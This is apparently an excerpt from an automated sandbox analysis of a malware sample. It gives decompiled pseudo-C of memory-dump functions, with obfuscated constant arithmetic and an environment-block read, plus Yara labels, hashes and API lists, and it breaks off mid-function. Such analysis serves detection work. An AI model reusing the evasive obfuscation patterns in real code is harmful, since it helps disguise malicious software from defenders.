                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 669e071c1581c48734254eaaa21a4a16af5eb2f45ab2fb20f55ff8b4b5e56d5d
                                              • Instruction ID: 515ab2d9ed92ce6ba1c9cbfeaedf590d4aaa23bf80b429ad75a9e9cfac639d07
                                              • Opcode Fuzzy Hash: 669e071c1581c48734254eaaa21a4a16af5eb2f45ab2fb20f55ff8b4b5e56d5d
                                              • Instruction Fuzzy Hash: 684146B2D10219EFDB48CFA5E94A4EEFBB5FF44314F20805AD501BA290D7B84A55CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002367E9, Relevance: .1, Instructions: 78COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002367E9() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0x23ca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0x23ca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E0022F536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E0023086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E0023422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E00234F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}



















                                              0x002398a6
                                              0x002398a9
                                              0x002398b2
                                              0x002398bf
                                              0x002398c3
                                              0x002398cb
                                              0x002398cd
                                              0x002398d2
                                              0x002398d6
                                              0x002398dd
                                              0x002398e9
                                              0x002398ec
                                              0x002398f3
                                              0x002398fa
                                              0x00239901
                                              0x00239905
                                              0x0023990c
                                              0x00239913
                                              0x0023991c
                                              0x0023991f
                                              0x00239926
                                              0x0023992d
                                              0x00239934
                                              0x00239937
                                              0x0023993b
                                              0x00239942
                                              0x00239949
                                              0x0023994d
                                              0x00239951
                                              0x00239958
                                              0x0023995f
                                              0x00239966
                                              0x0023996a
                                              0x00239971
                                              0x00239978
                                              0x0023997f
                                              0x00239986
                                              0x0023998d
                                              0x00239994
                                              0x0023999b
                                              0x002399a6
                                              0x002399a9
                                              0x002399b0
                                              0x002399b7
                                              0x002399be
                                              0x002399c1
                                              0x002399c8
                                              0x002399cf
                                              0x002399d3
                                              0x002399d7
                                              0x002399de
                                              0x00239a46
                                              0x002399ea
                                              0x00239a2e
                                              0x00239a3b
                                              0x00239a3d
                                              0x002399ec
                                              0x002399f9
                                              0x002399fe
                                              0x00239a04
                                              0x00239a51
                                              0x00239a51
                                              0x00239a06
                                              0x00239a0d
                                              0x00239a19
                                              0x00239a27
                                              0x00000000
                                              0x00239a2d
                                              0x00239a04
                                              0x00239a44
                                              0x00239a44
                                              0x00239a50

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0761b07f4cf0ac281901126de76b4bd316819ff5dc27cb8a1b4bec5c01dbfc65
                                              • Instruction ID: d94058851e99ad691889cfdfe7e0c7d5aa1e2f1eaf7989e4579ae6a770d92688
                                              • Opcode Fuzzy Hash: 0761b07f4cf0ac281901126de76b4bd316819ff5dc27cb8a1b4bec5c01dbfc65
                                              • Instruction Fuzzy Hash: A4410171D0131DDBDB48CFA5D68A4DEBBB0BB14758F208059C515BA290C7B80B49CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00237A0F, Relevance: .1, Instructions: 66COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00237A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E00237F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E0022D64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}














                                              0x00237a0f
                                              0x00237a15
                                              0x00237a21
                                              0x00237a28
                                              0x00237a2f
                                              0x00237a36
                                              0x00237a3d
                                              0x00237a44
                                              0x00237a48
                                              0x00237a4f
                                              0x00237a56
                                              0x00237a5a
                                              0x00237a61
                                              0x00237a68
                                              0x00237a6c
                                              0x00237a73
                                              0x00237a7a
                                              0x00237a7e
                                              0x00237a86
                                              0x00237a92
                                              0x00237a99
                                              0x00237aa3
                                              0x00237aa5
                                              0x00237aac
                                              0x00237aae
                                              0x00237aae
                                              0x00237ab4
                                              0x00237ae3
                                              0x00237ae4
                                              0x00237ae9
                                              0x00237aec
                                              0x00237aee
                                              0x00000000
                                              0x00237ab6
                                              0x00237ab8
                                              0x00000000
                                              0x00237aba
                                              0x00237ad2
                                              0x00237ad2
                                              0x00237ab8
                                              0x00237ad5
                                              0x00237adc
                                              0x00237adc
                                              0x00237af2
                                              0x00237af4
                                              0x00237af4
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                              • Instruction ID: 17b0fb7bb0e4b811e5587403f8e01df3ec3ee82dff6d6caddfd722d803766946
                                              • Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                              • Instruction Fuzzy Hash: 5C2189B1E14219ABDF54DEA4D88A4AFFBB0FB00308F648059D505B3241E3B54B54CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023687F, Relevance: .1, Instructions: 60COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E0023687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E0023674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}













                                              0x00236885
                                              0x0023688c
                                              0x00236893
                                              0x00236897
                                              0x0023689b
                                              0x002368a2
                                              0x002368a9
                                              0x002368b0
                                              0x002368be
                                              0x002368c5
                                              0x002368c8
                                              0x002368cf
                                              0x002368da
                                              0x002368e0
                                              0x002368e7
                                              0x002368ee
                                              0x002368f5
                                              0x002368f9
                                              0x00236900
                                              0x00236907
                                              0x0023690e
                                              0x00236915
                                              0x0023691c
                                              0x00236923
                                              0x0023692a
                                              0x0023692e
                                              0x00236950
                                              0x0023695a
                                              0x00236964

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                              • Instruction ID: 9c3e256c8f9ebbbc81008d5d61c249c13c6c34c69d44a56dd77fa5c105488b27
                                              • Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                              • Instruction Fuzzy Hash: 1F21E0B2D0021EABDB15CFE1C94A9EEFBB5FB10204F108299D521B61A0D3B84B59CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022C4FF, Relevance: .0, Instructions: 2COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0022C4FF() {

				return  *[fs:0x30];
			}



                                              0x0022c505

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                              • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10007337, Relevance: 19.6, APIs: 13, Instructions: 81COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E10007337(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10014d88);
				_t25 =  *0x100132dc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10004732( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x100132dc; // 0x0
				}
				_push(_t14);
				E10004732(_t25);
				_t26 =  *0x100132d8; // 0x0
				 *0x100132dc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10004732( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x100132d8; // 0x0
				}
				E10004732(_t26);
				 *0x100132d8 = 0;
				E10004732( *0x100132d4);
				_t5 = E10004732( *0x100132d0);
				 *0x100132d4 = 0;
				 *0x100132d0 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10004732(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10014d88 = _t5;
				_t6 =  *0x10013c1c; // 0x0
				if(_t6 != 0) {
					E10004732(_t6);
					 *0x10013c1c = 0;
				}
				_t7 =  *0x10013c20; // 0x0
				if(_t7 != 0) {
					E10004732(_t7);
					 *0x10013c20 = 0;
				}
				_t8 = InterlockedDecrement( *0x10012394);
				if(_t8 == 0) {
					_t8 =  *0x10012394; // 0x10012690
					if(_t8 != 0x10012690) {
						_t9 = E10004732(_t8);
						 *0x10012394 = 0x10012690;
						return _t9;
					}
				}
				return _t8;
			}












                                              0x10007337
                                              0x1000733f
                                              0x10007345
                                              0x1000734b
                                              0x1000734f
                                              0x10007351
                                              0x10007358
                                              0x1000735e
                                              0x10007361
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x10007361
                                              0x10007363
                                              0x10007363
                                              0x10007369
                                              0x1000736b
                                              0x10007370
                                              0x10007379
                                              0x10007381
                                              0x10007383
                                              0x10007389
                                              0x1000738f
                                              0x10007392
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x10007392
                                              0x10007394
                                              0x10007394
                                              0x1000739b
                                              0x100073a6
                                              0x100073ac
                                              0x100073b7
                                              0x100073bf
                                              0x100073c5
                                              0x100073ce
                                              0x100073d1
                                              0x100073d6
                                              0x100073d8
                                              0x100073de
                                              0x100073e3
                                              0x100073ea
                                              0x100073ed
                                              0x100073f3
                                              0x100073f3
                                              0x100073f9
                                              0x10007400
                                              0x10007403
                                              0x10007409
                                              0x10007409
                                              0x10007415
                                              0x1000741e
                                              0x10007420
                                              0x1000742c
                                              0x1000742f
                                              0x10007435
                                              0x00000000
                                              0x10007435
                                              0x1000742c
                                              0x1000743d

                                              APIs
                                              • DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
                                              • _free.LIBCMT ref: 10007358
                                                • Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
                                                • Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758
                                              • _free.LIBCMT ref: 1000736B
                                              • _free.LIBCMT ref: 10007389
                                              • _free.LIBCMT ref: 1000739B
                                              • _free.LIBCMT ref: 100073AC
                                              • _free.LIBCMT ref: 100073B7
                                              • _free.LIBCMT ref: 100073D1
                                              • EncodePointer.KERNEL32(00000000), ref: 100073D8
                                              • _free.LIBCMT ref: 100073ED
                                              • _free.LIBCMT ref: 10007403
                                              • InterlockedDecrement.KERNEL32 ref: 10007415
                                              • _free.LIBCMT ref: 1000742F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                              • String ID:
                                              • API String ID: 4264854383-0
                                              • Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                              • Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
                                              • Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                              • Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10002F70, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 222COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 55%
                                              			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v528;
				char _v1048;
				void* _v1052;
				void* _v1056;
				char _v1060;
				void* _v1064;
				char _v1068;
				char _v1084;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				char* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t152;

				_t63 =  *0x10012158; // 0x3c5a3040
				_v8 = _t63 ^ _t138;
				_t137 = _a4;
				_t136 = _a8;
				_t115 = __ecx;
				E100043E0( &_v528, 0, 0x208);
				_t67 =  &_v528;
				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
					L25:
					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
				} else {
					_t71 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1064;
					_v1064 = 0;
					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
					if(_t72 != 0) {
						_t137 = 0x8000ffff;
						L24:
						__imp__CoTaskMemFree(_v1068);
						goto L25;
					}
					_t120 = _v1064;
					_t134 =  &_v1060;
					_v1060 = _t72;
					_v1056 = _t120;
					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
					_t137 = _t75;
					if(_t75 == 0) {
						L6:
						if(_t152 < 0) {
							L22:
							_t76 = _v1064;
							 *((intOrPtr*)( *_t76 + 8))(_t76);
							goto L24;
						}
						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
						_t137 = _t80;
						if(_t80 < 0) {
							L21:
							_t81 = _v1060;
							 *((intOrPtr*)( *_t81 + 8))(_t81);
							goto L22;
						}
						_v1056 = 0;
						if( *_t136 == 0) {
							_t83 = _v1060;
							_t134 =  &_v1048;
							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
							_t137 = _t84;
							if(_t84 != 0) {
								goto L21;
							}
							_t85 = _v1060;
							_t134 =  &_v1052;
							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
							_t137 = _t86;
							if(_t86 < 0) {
								L20:
								_t87 = _v1056;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								goto L21;
							}
							L19:
							_t89 = _v1052;
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							goto L20;
						}
						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
						_t137 = _t93;
						if(_t93 < 0) {
							goto L21;
						}
						_t94 = _v1056;
						_t134 =  &_v1052;
						_v1052 = 0;
						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
						_t137 = _t95;
						if(_t95 < 0) {
							goto L20;
						}
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x448], xmm0");
						asm("movq [ebp-0x440], xmm0");
						_t98 = E10002390( &_v528,  &_v1100);
						_t137 = _t98;
						if(_t98 >= 0) {
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x438], xmm0");
							asm("movq [ebp-0x430], xmm0");
							_t100 = E10002390(_v1068,  &_v1084);
							_t136 = __imp__#9;
							_t137 = _t100;
							if(_t100 >= 0) {
								_t129 = _v1052;
								asm("movq xmm0, [ebp-0x448]");
								_t134 =  *_t129;
								asm("movq [eax], xmm0");
								asm("movq xmm0, [ebp-0x440]");
								asm("movq [eax+0x8], xmm0");
								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
								_t137 = _t104;
								if(_t104 >= 0) {
									_t130 = _v1052;
									asm("movq xmm0, [ebp-0x438]");
									_t134 =  *_t130;
									asm("movq [eax], xmm0");
									asm("movq xmm0, [ebp-0x430]");
									asm("movq [eax+0x8], xmm0");
									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
								}
								 *_t136( &_v1084);
							}
							 *_t136( &_v1100);
						}
						goto L19;
					}
					_t109 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1052;
					_v1052 = 0;
					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
					_t137 = _t110;
					if(_t110 < 0) {
						goto L22;
					}
					_t132 = _v1056;
					_t134 =  &_v1060;
					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
					_t137 = _t112;
					_t113 = _v1052;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t152 = _t112;
					goto L6;
				}
			}
















































                                              0x10002f79
                                              0x10002f80
                                              0x10002f85
                                              0x10002f89
                                              0x10002f9a
                                              0x10002f9c
                                              0x10002fa4
                                              0x10002fb1
                                              0x10002fb9
                                              0x10003285
                                              0x10003295
                                              0x10002fd7
                                              0x10002fd7
                                              0x10002fda
                                              0x10002fe0
                                              0x10002fee
                                              0x10002ff6
                                              0x10003272
                                              0x10003277
                                              0x1000327d
                                              0x00000000
                                              0x10003283
                                              0x10002ffc
                                              0x10003002
                                              0x10003009
                                              0x10003017
                                              0x1000301d
                                              0x10003023
                                              0x10003027
                                              0x1000307e
                                              0x1000307e
                                              0x10003264
                                              0x10003264
                                              0x1000326d
                                              0x00000000
                                              0x1000326d
                                              0x1000309c
                                              0x100030a1
                                              0x100030a8
                                              0x10003258
                                              0x10003258
                                              0x10003261
                                              0x00000000
                                              0x10003261
                                              0x100030b2
                                              0x100030bc
                                              0x100031fe
                                              0x1000320d
                                              0x10003215
                                              0x1000321b
                                              0x1000321f
                                              0x00000000
                                              0x00000000
                                              0x10003221
                                              0x10003227
                                              0x10003237
                                              0x1000323a
                                              0x1000323e
                                              0x1000324c
                                              0x1000324c
                                              0x10003255
                                              0x00000000
                                              0x10003255
                                              0x10003240
                                              0x10003240
                                              0x10003249
                                              0x00000000
                                              0x10003249
                                              0x100030dd
                                              0x100030e2
                                              0x100030e6
                                              0x00000000
                                              0x00000000
                                              0x100030ec
                                              0x100030f2
                                              0x100030f9
                                              0x1000310b
                                              0x1000310d
                                              0x10003111
                                              0x00000000
                                              0x00000000
                                              0x1000311e
                                              0x10003128
                                              0x10003130
                                              0x10003138
                                              0x1000313d
                                              0x10003144
                                              0x10003157
                                              0x1000315a
                                              0x10003162
                                              0x1000316a
                                              0x1000316f
                                              0x10003175
                                              0x1000317c
                                              0x1000317e
                                              0x10003184
                                              0x1000318c
                                              0x10003198
                                              0x1000319c
                                              0x100031a5
                                              0x100031aa
                                              0x100031b0
                                              0x100031b4
                                              0x100031b6
                                              0x100031bc
                                              0x100031c4
                                              0x100031d0
                                              0x100031d4
                                              0x100031dd
                                              0x100031e8
                                              0x100031e8
                                              0x100031f1
                                              0x100031f1
                                              0x100031fa
                                              0x100031fa
                                              0x00000000
                                              0x10003144
                                              0x10003029
                                              0x1000302c
                                              0x10003033
                                              0x10003045
                                              0x1000304b
                                              0x1000304f
                                              0x00000000
                                              0x00000000
                                              0x10003055
                                              0x1000305b
                                              0x1000306b
                                              0x1000306e
                                              0x10003070
                                              0x10003079
                                              0x1000307c
                                              0x00000000
                                              0x1000307c

                                              APIs
                                              • _memset.LIBCMT ref: 10002F9C
                                              • PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1
                                                • Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                                • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                                • Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
                                                • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                                • Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                                • Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6
                                              • VariantClear.OLEAUT32(?), ref: 100031F1
                                              • VariantClear.OLEAUT32(?), ref: 100031FA
                                              • CoTaskMemFree.OLE32(?), ref: 1000327D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp Download File
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
                                              • String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
                                              • API String ID: 2822920939-4160240301
                                              • Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                              • Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
                                              • Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                              • Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 10003400, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 85registrystringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 55%
                                              			E10003400(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t26;
				wchar_t* _t32;
